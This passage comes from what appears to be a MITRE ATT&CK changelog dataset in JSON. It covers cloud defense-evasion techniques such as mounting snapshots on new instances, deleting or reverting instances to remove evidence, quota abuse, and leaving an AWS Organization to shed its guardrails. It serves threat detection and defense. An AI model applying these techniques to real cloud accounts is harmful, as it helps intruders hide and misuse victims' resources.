                            "source_name": "dump_pwd_dcsync",
                            "description": "Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.",
                            "url": "https://adsecurity.org/?p=2053"
                        },
                        {
                            "source_name": "store_pwd_rev_enc",
                            "description": "Microsoft. (2021, October 28). Store passwords using reversible encryption. Retrieved January 3, 2022.",
                            "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption"
                        },
                        {
                            "source_name": "how_pwd_rev_enc_1",
                            "description": "Teusink, N. (2009, August 25). Passwords stored using reversible encryption: how it works (part 1). Retrieved November 17, 2021.",
                            "url": "http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html"
                        },
                        {
                            "source_name": "how_pwd_rev_enc_2",
                            "description": "Teusink, N. (2009, August 26). Passwords stored using reversible encryption: how it works (part 2). Retrieved November 17, 2021.",
                            "url": "http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.082000+00:00\", \"old_value\": \"2025-10-24 17:49:27.587000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0589: Detect Modification of Authentication Process via Reversible Encryption"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-08-30 18:03:05.864000+00:00",
                    "modified": "2026-04-16 20:07:52.919000+00:00",
                    "name": "Modify Cloud Compute Infrastructure",
                    "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1578",
                            "external_id": "T1578"
                        },
                        {
                            "source_name": "Mandiant M-Trends 2020",
                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.919000+00:00\", \"old_value\": \"2025-10-24 17:48:26.284000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0308: Detection Strategy for Modify Cloud Compute Infrastructure"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-14 14:45:15.978000+00:00",
                    "modified": "2026-04-16 20:07:52.862000+00:00",
                    "name": "Create Cloud Instance",
                    "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1578/002",
                            "external_id": "T1578.002"
                        },
                        {
                            "source_name": "Mandiant M-Trends 2020",
                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Arun Seelagan, CISA"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.862000+00:00\", \"old_value\": \"2025-10-24 17:49:24.804000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"AWS CloudTrail Search\", \"description\": \"Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.\", \"url\": \"https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/\"}, \"root['external_references'][2]\": {\"source_name\": \"Cloud Audit Logs\", \"description\": \"Google. (n.d.). Audit Logs. Retrieved June 1, 2020.\", \"url\": \"https://cloud.google.com/logging/docs/audit#admin-activity\"}, \"root['external_references'][4]\": {\"source_name\": \"Azure Activity Logs\", \"description\": \"Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0449: Detection Strategy for Modify Cloud Compute Infrastructure: Create Cloud Instance"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-09 15:33:13.563000+00:00",
                    "modified": "2026-04-16 20:07:52.934000+00:00",
                    "name": "Create Snapshot",
                    "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1578/001",
                            "external_id": "T1578.001"
                        },
                        {
                            "source_name": "Mandiant M-Trends 2020",
                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Praetorian"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.934000+00:00\", \"old_value\": \"2025-10-24 17:49:34.416000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"AWS Cloud Trail Backup API\", \"description\": \"Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. Retrieved April 27, 2020.\", \"url\": \"https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html\"}, \"root['external_references'][2]\": {\"source_name\": \"GCP - Creating and Starting a VM\", \"description\": \"Google. (2020, April 23). Creating and Starting a VM instance. Retrieved May 1, 2020.\", \"url\": \"https://cloud.google.com/compute/docs/instances/create-start-instance#api_2\"}, \"root['external_references'][3]\": {\"source_name\": \"Cloud Audit Logs\", \"description\": \"Google. (n.d.). Audit Logs. Retrieved June 1, 2020.\", \"url\": \"https://cloud.google.com/logging/docs/audit#admin-activity\"}, \"root['external_references'][5]\": {\"source_name\": \"Azure - Monitor Logs\", \"description\": \"Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor. Retrieved May 1, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0423: Detection Strategy for Modify Cloud Compute Infrastructure: Create Snapshot"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-16 17:23:06.508000+00:00",
                    "modified": "2026-04-16 20:07:52.915000+00:00",
                    "name": "Delete Cloud Instance",
                    "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1578/003",
                            "external_id": "T1578.003"
                        },
                        {
                            "source_name": "Mandiant M-Trends 2020",
                            "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024.",
                            "url": "https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Arun Seelagan, CISA"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.915000+00:00\", \"old_value\": \"2025-10-24 17:48:56.705000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"AWS CloudTrail Search\", \"description\": \"Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.\", \"url\": \"https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/\"}, \"root['external_references'][2]\": {\"source_name\": \"Cloud Audit Logs\", \"description\": \"Google. (n.d.). Audit Logs. Retrieved June 1, 2020.\", \"url\": \"https://cloud.google.com/logging/docs/audit#admin-activity\"}, \"root['external_references'][4]\": {\"source_name\": \"Azure Activity Logs\", \"description\": \"Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0084: Detection Strategy for Modify Cloud Compute Infrastructure: Delete Cloud Instance"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-09-05 14:19:17.486000+00:00",
                    "modified": "2026-04-16 20:07:53.098000+00:00",
                    "name": "Modify Cloud Compute Configurations",
                    "description": "Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim\u2019s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.\n\nFor example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim\u2019s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1578/005",
                            "external_id": "T1578.005"
                        },
                        {
                            "source_name": "Microsoft Cryptojacking 2023",
                            "description": "Microsoft Threat Intelligence. (2023, July 25). Cryptojacking: Understanding and defending against cloud compute resource abuse. Retrieved September 5, 2023.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/"
                        },
                        {
                            "source_name": "Microsoft Azure Policy",
                            "description": "Microsoft. (2023, August 30). Azure Policy built-in policy definitions. Retrieved September 5, 2023.",
                            "url": "https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Amir Gharib, Microsoft Threat Intelligence",
                        "Blake Strom, Microsoft Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.098000+00:00\", \"old_value\": \"2025-04-15 22:49:17.012000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0492: Detection Strategy for Modify Cloud Compute Infrastructure: Modify Cloud Compute Configurations"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-16 18:42:20.734000+00:00",
                    "modified": "2026-04-16 20:07:52.953000+00:00",
                    "name": "Revert Cloud Instance",
                    "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1578/004",
                            "external_id": "T1578.004"
                        },
                        {
                            "source_name": "Google - Restore Cloud Snapshot",
                            "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.",
                            "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots"
                        },
                        {
                            "source_name": "Tech Republic - Restore AWS Snapshots",
                            "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.",
                            "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Netskope"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.953000+00:00\", \"old_value\": \"2025-10-24 17:48:21.210000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0337: Detection Strategy for Modify Cloud Compute Infrastructure: Revert Cloud Instance"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-09-25 14:16:19.234000+00:00",
                    "modified": "2026-04-16 20:07:52.999000+00:00",
                    "name": "Modify Cloud Resource Hierarchy",
                    "description": "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.  \n\nIaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim\u2019s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS re Inforce Trust Mod)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1666",
                            "external_id": "T1666"
                        },
                        {
                            "source_name": "AWS re Inforce Trust Mod",
                            "description": "AWS re Inforce. (2024, June). Retrieved April 15, 2026.",
                            "url": "https://d1.awsstatic.com/onedam/marketing-channels/website/aws/en_US/events/approved/reinforce-2025/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf"
                        },
                        {
                            "source_name": "AWS Organizations",
                            "description": "AWS. (n.d.). Terminology and concepts for AWS Organizations. Retrieved September 25, 2024.",
                            "url": "https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html"
                        },
                        {
                            "source_name": "Microsoft Subscription Hijacking 2022",
                            "description": "Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.",
                            "url": "https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121"
                        },
                        {
                            "source_name": "Microsoft Azure Resources",
                            "description": "Microsoft Azure. (2024, May 31). Organize your Azure resources effectively. Retrieved September 25, 2024.",
                            "url": "https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources"
                        },
                        {
                            "source_name": "Microsoft Peach Sandstorm 2023",
                            "description": "Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved September 18, 2023.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.999000+00:00\", \"old_value\": \"2025-04-15 22:49:45.874000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.  \\n\\nIaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)\\n\\nAdversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim\\u2019s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)\\n\\nIn AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods 